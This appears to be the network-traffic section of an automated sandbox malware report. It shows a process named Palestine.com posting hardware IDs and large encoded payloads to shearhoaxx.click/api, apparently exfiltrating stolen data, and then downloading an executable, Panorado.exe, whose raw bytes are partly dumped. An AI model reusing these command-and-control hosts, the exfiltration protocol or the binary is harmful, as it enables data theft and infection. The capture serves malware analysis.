                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675dc6caae433e-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1759&rtt_var=668&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2081&delivery_rate=1626740&cwnd=249&unsent_bytes=0&cid=a448cbe34bf15425&ts=754&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:36:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            17192.168.2.1649719172.67.129.494436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:18 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=XMMU9DZE5L
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 59251
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:36:18 UTC15331OUTData Raw: 2d 2d 58 4d 4d 55 39 44 5a 45 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 58 4d 4d 55 39 44 5a 45 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 4d 4d 55 39 44 5a 45 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 58 4d 4d 55 39 44 5a 45 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                                                            Data Ascii: --XMMU9DZE5LContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--XMMU9DZE5LContent-Disposition: form-data; name="pid"1--XMMU9DZE5LContent-Disposition: form-data; name="lid"Dvh8ui--888--XMMU9DZE5LContent-Di
                                                                                                                                                                                                                                            2024-12-23 09:36:18 UTC15331OUTData Raw: 04 c8 9d b0 20 93 28 7a 82 d5 11 b4 56 e3 57 55 82 3a a9 d5 86 16 7d ee dc e8 1c fb 59 3d a9 1b 63 89 0e b5 69 c3 2f 2a bb 26 03 ec e6 61 58 ff f9 9c 1b 66 e8 aa ea 34 f8 32 47 17 ba fe e2 bc 9e 65 f4 66 e5 e3 a2 83 bd bd d8 19 a9 18 83 f2 b7 a9 d9 e0 72 33 30 b1 da e6 ec 54 a8 bd aa f7 bd 75 b6 2f e2 05 a9 f7 fd 0b 38 d6 32 f1 4c ea 7e 48 c6 d9 84 80 30 49 60 a1 d0 da 3e 61 6b c5 b6 18 dd 6e 1f 3a 8d 91 a5 58 68 38 08 cb b9 16 d7 7f ea d7 ad 6b 54 29 ee 3f 5b fc 97 1f 75 72 42 f2 ae 3d 85 9e 6b 15 3b 6c 74 a5 2b b2 d7 27 7c e9 e2 de 72 5c bb 8d 61 bb c1 33 ce 26 b0 59 fa f0 67 81 86 77 f8 c9 59 39 6b 88 7a f5 8d 98 4d ff 47 28 92 db db 4d 7f 82 e8 b3 bd a7 e9 5f fc 85 54 86 14 7c 94 35 39 65 2e 25 71 29 9e 87 92 a0 a1 6e 68 51 35 9f 9e 61 9e da 95 a1 0b
                                                                                                                                                                                                                                            Data Ascii: (zVWU:}Y=ci/*&aXf42Gefr30Tu/82L~H0I`>akn:Xh8kT)?[urB=k;lt+'|r\a3&YgwY9kzMG(M_T|59e.%q)nhQ5a
                                                                                                                                                                                                                                            2024-12-23 09:36:18 UTC15331OUTData Raw: ef e9 c9 f6 dd 09 7d 78 44 3a 65 e0 72 a2 74 e0 01 0b 62 ef c7 69 0e ca 1b c4 37 65 be ef 69 fc f3 88 5c 8b 1f 49 6c a3 95 3d 3f 83 cf ec e1 5a 38 85 6f 98 df e9 5c 57 c5 8b 8d 7c f3 4f 4f 79 ff d1 d4 3a 4c 3a 64 3d c1 e3 4c 93 ff 06 87 5c 39 7e 2f b8 68 71 71 cb bc 1d c1 ba 5f fb 29 29 7a 1a 9f a4 8f c4 5e 53 4c 22 28 7c 23 d0 7f 0f 0b 9f dc b1 7e 75 b1 c1 7f 83 28 14 80 3b d9 e4 19 bc 5a 7d 6b 13 df be b8 73 6e a5 fa a5 7f 7d cd 8b e8 61 1c f7 ae dc 9b bd 90 6a 7f 86 e1 b2 5f f5 d7 3a b0 4e a6 b8 68 3d 80 6e 07 ab fe 12 1d ef 07 5f dc 23 78 1e 1e 7c 39 43 0b da 99 98 30 24 79 78 f0 2c d5 32 7f d2 31 22 d7 96 77 dd 65 23 e0 b8 34 be 63 cd 2b 0e 56 59 5b b0 a6 5f 11 7f bb bd 21 49 ec fb b4 04 65 9b 93 4b bb 7c e0 26 c5 09 07 ac 24 12 f7 1e 0a b8 e1 d9 a6
                                                                                                                                                                                                                                            Data Ascii: }xD:ertbi7ei\Il=?Z8o\W|OOy:L:d=L\9~/hqq_))z^SL"(|#~u(;Z}ksn}aj_:Nh=n_#x|9C0$yx,21"we#4c+VY[_!IeK|&$
                                                                                                                                                                                                                                            2024-12-23 09:36:18 UTC13258OUTData Raw: fc 09 ff 29 b0 a2 f7 45 9b 4a 29 bd be a4 12 f6 3f b0 eb 6f fa 74 02 5e 36 26 6c c2 40 99 ab df ff 18 02 c3 f7 c2 0d 81 91 a4 54 2c 88 3c cb b3 ea 42 9c 6e 9d 24 37 fb f9 0d a9 07 2c 0d 87 fd bd c9 c1 30 04 52 32 72 8f 22 53 4c b8 4e 16 33 21 de f4 7b 5c de e1 c2 14 fe 7a 75 1c 71 67 53 50 7d b7 84 0a 33 76 b4 50 4e e0 42 31 fb f7 d4 5b 6f 21 05 89 cb a1 fd 2f ce 47 ae 88 d9 ed ae 9e 87 74 9e 3e b8 71 92 00 22 52 48 94 df 61 85 d9 ae 27 4e ce bf ed 53 5f bc df c1 44 f2 68 98 c7 4a cc 73 de 7c 03 e2 8e 8b 4c fb 37 38 f0 20 e5 f2 ef 77 a0 9d 1e ba bc 40 0f 2d 71 45 14 a1 d0 fc c4 e5 73 9f 1c 29 ad ba 14 22 5e d3 77 9b 8f 64 69 be f5 47 41 0a ad 71 eb 70 ba db 7f de 3c 95 63 01 4d 19 13 96 b4 6c f8 b4 13 b2 0b 66 40 14 17 47 b9 9f 5d fa f7 ee e4 ec 29 68 ea
                                                                                                                                                                                                                                            Data Ascii: )EJ)?ot^6&l@T,<Bn$7,0R2r"SLN3!{\zuqgSP}3vPNB1[o!/Gt>q"RHa'NS_DhJs|L78 w@-qEs)"^wdiGAqp<cMlf@G])h
                                                                                                                                                                                                                                            2024-12-23 09:36:19 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4n66bntu1bp8dr4nhv20evadsb; expires=Fri, 18 Apr 2025 03:22:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1Aq4OxjmsFw%2Fq6C6noTVgHIMmtnYaTuwAgg44dkWQ0N%2FRSBDDVEglQrur4D%2FeZLL44C7yTvFgsQavoDTZMmRot9AcahqBpRBvXyBvcZGnhSUiG04%2Fr1UmIcMCrdzL959Rkq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675dd4cf317d24-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2012&rtt_var=774&sent=31&recv=64&lost=0&retrans=0&sent_bytes=2841&recv_bytes=60315&delivery_rate=1395126&cwnd=193&unsent_bytes=0&cid=de62d8a48215cade&ts=1289&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            18192.168.2.1649720172.67.129.494436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:21 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 80
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:36:21 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d 26 68 77 69 64 3d 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=Dvh8ui--888&j=&hwid=6E31A45A7B5F2CA1C8BA21E021A8AA6E
                                                                                                                                                                                                                                            2024-12-23 09:36:21 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=a7u6g7c1ss536gl4am1cj2rpnp; expires=Fri, 18 Apr 2025 03:23:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTSvMsCDiTIruyI9X3EC9DwafChfwtPSq6A6U9YfJ1m3I70OIFsjyXVHuKAhkhuW%2FVlomM6S2umGLbxOlaeVhIm%2Bjq2Guh8nbLOPMb%2BCdAShPYwmcUpFMST00bzwBJK%2Fy7Ww"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675de528564257-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1623&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=980&delivery_rate=1772920&cwnd=215&unsent_bytes=0&cid=49207bfb3104156a&ts=766&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:21 UTC230INData Raw: 65 30 0d 0a 32 6a 71 7a 50 6d 59 49 53 36 39 38 56 75 63 57 6c 6a 50 53 56 48 73 68 7a 58 68 53 4c 33 6c 4f 53 30 62 79 66 36 62 35 70 33 71 42 51 5a 46 4c 52 44 4a 70 78 77 67 69 6c 32 57 73 62 2f 30 49 56 45 71 68 45 53 4a 44 46 6a 77 69 4c 70 30 61 6c 74 66 55 45 72 56 4b 37 78 45 50 5a 6a 2f 77 48 7a 71 58 53 66 70 58 6f 41 73 4c 51 4b 4e 57 4a 6c 63 4e 62 47 64 6b 6c 41 75 45 77 35 56 57 2b 46 2b 52 42 46 64 31 5a 39 52 65 49 38 55 73 74 46 75 6d 49 41 74 53 39 79 52 39 63 31 59 39 4a 79 6d 47 43 4d 65 58 77 46 53 35 56 64 35 69 53 57 34 69 77 78 6b 4b 79 45 62 33 58 62 30 6d 47 6b 57 69 56 6a 64 58 48 47 78 6e 5a 4a 51 4c 68 4d 4f 58 56 76 68 66 6b 51 52 57 64 52 59 3d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: e02jqzPmYIS698VucWljPSVHshzXhSL3lOS0byf6b5p3qBQZFLRDJpxwgil2Wsb/0IVEqhESJDFjwiLp0altfUErVK7xEPZj/wHzqXSfpXoAsLQKNWJlcNbGdklAuEw5VW+F+RBFd1Z9ReI8UstFumIAtS9yR9c1Y9JymGCMeXwFS5Vd5iSW4iwxkKyEb3Xb0mGkWiVjdXHGxnZJQLhMOXVvhfkQRWdRY=
                                                                                                                                                                                                                                            2024-12-23 09:36:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            19192.168.2.164972245.66.248.1344436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:24 UTC204OUTGET /file/Panorado.exe HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: slotwang.com
                                                                                                                                                                                                                                            2024-12-23 09:36:24 UTC265INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:24 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 18610385
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Last-Modified: Sun, 22 Dec 2024 20:02:20 GMT
                                                                                                                                                                                                                                            ETag: "11bf8d1-629e15b83ab00"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-12-23 09:36:24 UTC16119INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                            2024-12-23 09:36:24 UTC16384INData Raw: 00 fc 4a 40 00 0d 0a 54 54 79 70 65 54 61 62 6c 65 fc ff ff 7f ff ff ff 1f 00 11 40 00 01 00 00 00 00 02 00 00 20 4b 40 00 14 0a 50 54 79 70 65 54 61 62 6c 65 f8 4a 40 00 02 00 00 00 38 4b 40 00 14 10 50 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 50 4b 40 00 02 00 54 4b 40 00 0e 10 54 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 10 00 00 00 00 00 00 00 00 04 00 00 00 9c 10 40 00 00 00 00 00 02 09 54 79 70 65 43 6f 75 6e 74 02 00 1c 4b 40 00 04 00 00 00 02 09 54 79 70 65 54 61 62 6c 65 02 00 9c 10 40 00 08 00 00 00 02 09 55 6e 69 74 43 6f 75 6e 74 02 00 5c 2a 40 00 0c 00 00 00 02 09 55 6e 69 74 4e 61 6d 65 73 02 00 02 00 00 00 00 d0 4b 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 42 79 74 65 3e 01 00 00 00 00 00 00 00 11 00 00 00 b4 10 40 00 06
                                                                                                                                                                                                                                            Data Ascii: J@TTypeTable@ K@PTypeTableJ@8K@PPackageTypeInfoPK@TK@TPackageTypeInfo@TypeCountK@TypeTable@UnitCount\*@UnitNamesK@TArray<System.Byte>@
                                                                                                                                                                                                                                            2024-12-23 09:36:24 UTC16384INData Raw: 89 1a 33 c0 5a 59 59 64 89 10 68 1b 8b 40 00 8b 45 fc 83 c0 18 e8 07 f9 ff ff 58 ff e0 e9 3b 05 00 00 eb eb 5e 5b 59 5d c3 53 8b d8 83 3d f8 d8 4a 00 00 75 07 b0 1a e8 71 e5 ff ff 8b c3 e8 e6 fd ff ff e8 05 00 00 00 5b c3 8d 40 00 53 8b d8 e8 94 c6 ff ff 3b 43 08 75 07 ff 43 04 b0 01 5b c3 83 3b 00 75 22 33 c0 ba 01 00 00 00 f0 0f b1 13 85 c0 75 13 e8 6f c6 ff ff 89 43 08 c7 43 04 01 00 00 00 b0 01 eb 02 33 c0 5b c3 90 55 8b ec 83 c4 e8 53 56 57 89 4d fc 8b da 8b f0 33 c0 89 45 e8 8b c3 e8 94 f9 ff ff 89 45 ec 8b 3d f8 d8 4a 00 ff 57 08 89 45 f0 33 c0 55 68 28 8c 40 00 64 ff 30 64 89 20 8b 43 04 89 45 f4 8d 55 e8 8b c6 e8 3f fe ff ff c7 43 04 01 00 00 00 8b c3 e8 59 fc ff ff 8b 3d f8 d8 4a 00 8b 4d fc 8b 55 f0 33 c0 ff 57 10 85 c0 0f 94 45 fb 8b c3 83 ca
                                                                                                                                                                                                                                            Data Ascii: 3ZYYdh@EX;^[Y]S=Juq[@S;CuC[;u"3uoCC3[USVWM3EE=JWE3Uh(@d0d CEU?CY=JMU3WE
                                                                                                                                                                                                                                            2024-12-23 09:36:25 UTC16384INData Raw: c6 8b 4d f8 8b 09 8d 04 01 8b 4d f4 2b cf 0f af ce e8 43 a8 ff ff 85 db 74 18 0f af fe 8b 45 f8 8b 00 03 c7 6a 01 8b 55 fc 8b cb e8 91 f1 ff ff eb 7d 83 fe 08 75 1b 8b c7 c1 e0 03 8b 55 f8 8b 12 8b 4d fc 8b 19 89 1c 02 8b 59 04 89 5c 02 04 eb 5d 83 fe 04 75 14 8b c7 c1 e0 02 8b 55 f8 8b 12 8b 4d fc 8b 09 89 0c 02 eb 44 83 fe 02 75 15 8b c7 03 c0 8b 55 f8 8b 12 8b 4d fc 0f b7 09 66 89 0c 02 eb 2a 83 fe 01 75 10 8b 45 f8 8b 00 8b 55 fc 0f b6 12 88 14 38 eb 15 0f af fe 8b 45 f8 8b 00 8d 14 38 8b 45 fc 8b ce e8 aa a7 ff ff 5f 5e 5b 8b e5 5d c2 04 00 90 53 56 81 c4 f4 fd ff ff 8b d8 83 7b 10 00 75 2b 68 05 01 00 00 8d 44 24 04 50 8b 43 04 50 e8 65 86 ff ff 8b c4 b2 01 e8 94 12 00 00 8b f0 89 73 10 85 f6 75 06 8b 43 04 89 43 10 8b 43 10 81 c4 0c 02 00 00 5e 5b
                                                                                                                                                                                                                                            Data Ascii: MM+CtEjU}uUMY\]uUMDuUMf*uEU8E8E_^[]SV{u+hD$PCPesuCCC^[
                                                                                                                                                                                                                                            2024-12-23 09:36:25 UTC16384INData Raw: c6 8b 08 ff 51 2c 8b f8 8b d7 8b c6 e8 18 00 00 00 84 c0 74 09 8b d3 8b c6 8b 08 ff 51 24 4b 83 fb ff 75 d9 5f 5e 5b c3 90 55 8b ec 83 c4 f4 89 55 fc 8b 45 fc 8b 00 e8 ed 7f ff ff 88 45 fb 80 7d fb 00 74 65 33 d2 55 68 9a 0b 41 00 64 ff 32 64 89 22 8b 45 fc 8b 00 f6 40 0c 01 75 03 ff 48 08 33 c0 5a 59 59 64 89 10 68 a1 0b 41 00 8b 45 fc 8b 00 83 78 08 00 75 1e e8 07 7d ff ff 8b 45 fc 89 45 f4 8b 45 f4 8b 00 8b 55 f4 33 c9 89 0a e8 5c 72 ff ff eb 09 e8 e9 7c ff ff c6 45 fb 00 58 ff e0 e9 b5 84 ff ff eb c4 0f b6 45 fb 8b e5 5d c3 8d 40 00 53 56 e8 b1 77 ff ff 8b da 8b f0 8b 46 04 e8 29 72 ff ff b2 fc 22 d3 8b c6 e8 0e 72 ff ff 84 db 7e 07 8b c6 e8 37 77 ff ff 5e 5b c3 c3 8d 40 00 ff 05 5c 06 4b 00 c3 90 ff 25 14 55 4b 00 8b c0 ff 25 24 55 4b 00 8b c0 ff 25
                                                                                                                                                                                                                                            Data Ascii: Q,tQ$Ku_^[UUEE}te3UhAd2d"E@uH3ZYYdhAExu}EEEU3\r|EXE]@SVwF)r"r~7w^[@\K%UK%$UK%
                                                                                                                                                                                                                                            2024-12-23 09:36:25 UTC16384INData Raw: 07 07 07 0c 0c 0c 0c 0c 02 02 02 02 02 05 05 02 05 05 05 05 05 05 05 02 05 05 02 02 02 07 07 07 07 07 07 07 1a 1a 0f 0f 0f 0f 0f 0f 0f 07 07 07 07 07 07 07 07 07 07 02 02 02 02 02 15 07 07 07 07 07 07 07 07 02 02 02 02 0f 0f 07 07 17 17 0f 0f 0f 0f 0f 0f 1a 17 07 15 0c 02 07 0c 0c 0c 02 0c 0c 02 02 02 02 02 0c 0c 0c 0c 06 06 1a 15 15 15 06 02 02 0c 17 17 19 18 1a 17 17 02 1a 19 19 19 19 1a 1a 02 07 07 07 07 07 07 07 07 1a 07 07 07 07 07 07 07 07 07 07 07 0a 0a 0c 0c 0c 0c 0c 02 02 02 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 02 02 02 02 02 02 02 02 02 02 02 07 07 07 07 07 0c 0c 02 02 02 02 0f 0f 0f 0f 0f 07 07 07 07 07 07 02 02 02 15 15 15 15 15 15 15 06 15 15 15 15 15 15 02 02 07 07 07 07 07 07 02 02 0f 0f 0f 0f 0f 0f 0f 0f 0f 1a 07 07 07 07 07 07 07 07 07 07 07
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            2024-12-23 09:36:25 UTC16384INData Raw: 00 50 89 41 00 f8 7e 40 00 00 7f 40 00 04 2f 42 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 34 2e 42 00 ac 2e 42 00 78 2e 42 00 00 00 00 00 02 00 09 45 49 6e 74 45 72 72 6f 72 44 8b 41 00 07 09 45 49 6e 74 45 72 72 6f 72 28 8b 41 00 e4 89 41 00 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 00 00 cc 8b 41 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 8b 41 00 00 00 00 00 d4 8b 41 00 00 00 00 00 da 8b 41 00 20 00 00 00 d0 8a 41 00 f8 7e 40 00 00 7f 40 00 04 2f 42 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 34 2e 42 00 ac 2e 42 00 78 2e 42 00 00 00 00 00 02 00 0a 45 44 69 76 42 79 5a 65 72 6f 00 00 00 ec 8b 41 00 07 0a 45 44 69 76 42 79 5a 65
                                                                                                                                                                                                                                            Data Ascii: PA~@@/B@@@@@}@}@4.B.Bx.BEIntErrorDAEIntError(AASystem.SysUtilsAAAA A~@@/B@@@@@}@}@4.B.Bx.BEDivByZeroAEDivByZe
                                                                                                                                                                                                                                            2024-12-23 09:36:25 UTC16384INData Raw: ff 00 81 7d f4 b3 b6 e0 0d 75 07 81 7d f0 00 00 64 a7 73 da 83 45 e4 02 8b 45 e4 66 c7 00 30 00 eb 14 81 6d f0 00 00 8a 5d 81 5d f4 78 45 63 01 8b 45 e4 66 ff 00 81 7d f4 78 45 63 01 75 07 81 7d f0 00 00 8a 5d 73 da 83 45 e4 02 b3 11 8b 45 f0 89 45 e8 8b 45 f4 89 45 ec 6a 00 68 00 e1 f5 05 8b 45 f0 8b 55 f4 e8 a5 f4 fe ff 89 45 f0 89 55 f4 6a 00 68 00 e1 f5 05 8b 45 f0 8b 55 f4 e8 d5 f3 fe ff 29 45 e8 19 55 ec 8b 7d e8 8b c7 e8 19 fd ff ff 8b f0 6b c6 64 2b f8 8b 04 bd de ab 4a 00 0f b6 d3 03 d2 03 55 e4 83 ea 04 89 02 8b fe 8b c6 e8 f5 fc ff ff 8b f0 6b c6 64 2b f8 8b 04 bd de ab 4a 00 0f b6 d3 03 d2 03 55 e4 83 ea 08 89 02 8b fe 8b c6 e8 d1 fc ff ff 8b f0 6b c6 64 2b f8 8b 04 bd de ab 4a 00 0f b6 d3 03 d2 03 55 e4 83 ea 0c 89 02 8b 04 b5 de ab 4a 00 0f
                                                                                                                                                                                                                                            Data Ascii: }u}dsEEf0m]]xEcEf}xEcu}]sEEEEEjhEUEUjhEU)EU}kd+JUkd+JUkd+JUJ
                                                                                                                                                                                                                                            2024-12-23 09:36:25 UTC16384INData Raw: 4d de 8b 55 e8 8b 45 ec e8 e4 f8 ff ff 85 c0 75 07 33 db e9 ec 01 00 00 80 4d d7 01 e9 0d 01 00 00 f6 45 d7 08 74 07 33 db e9 d6 01 00 00 8b 45 ec 85 c0 74 05 83 e8 04 8b 00 8b 55 e8 3b 02 7c 10 8b 45 e8 8b 00 8b 55 ec 66 83 7c 42 fe 20 75 0a 80 7b 04 00 0f 84 e0 00 00 00 80 3b 07 75 4b 83 7d fc 00 75 4a 8b 45 08 8b 80 bc 00 00 00 85 c0 74 05 83 e8 04 8b 00 48 78 29 8b 45 08 8b 80 bc 00 00 00 85 c0 74 05 83 e8 04 8b 00 48 8d 04 40 8b 55 08 8b 92 bc 00 00 00 8b 44 c2 04 48 89 45 fc eb 0c 33 db e9 59 01 00 00 33 c0 89 45 fc 80 7b 01 02 77 16 83 ff 40 74 0a 0f b6 43 04 04 fc 2c 04 72 07 be 04 00 00 00 eb 04 0f b6 73 01 56 8d 4d e2 8b 55 e8 8b 45 ec e8 12 f8 ff ff 8b f0 85 f6 75 07 33 db e9 18 01 00 00 83 fe 02 7f 09 80 3b 04 75 04 80 4d d7 20 80 4d d7 08 eb
                                                                                                                                                                                                                                            Data Ascii: MUEu3MEt3EtU;|EUf|B u{;uK}uJEtHx)EtH@UDHE3Y3E{w@tC,rsVMUEu3;uM M
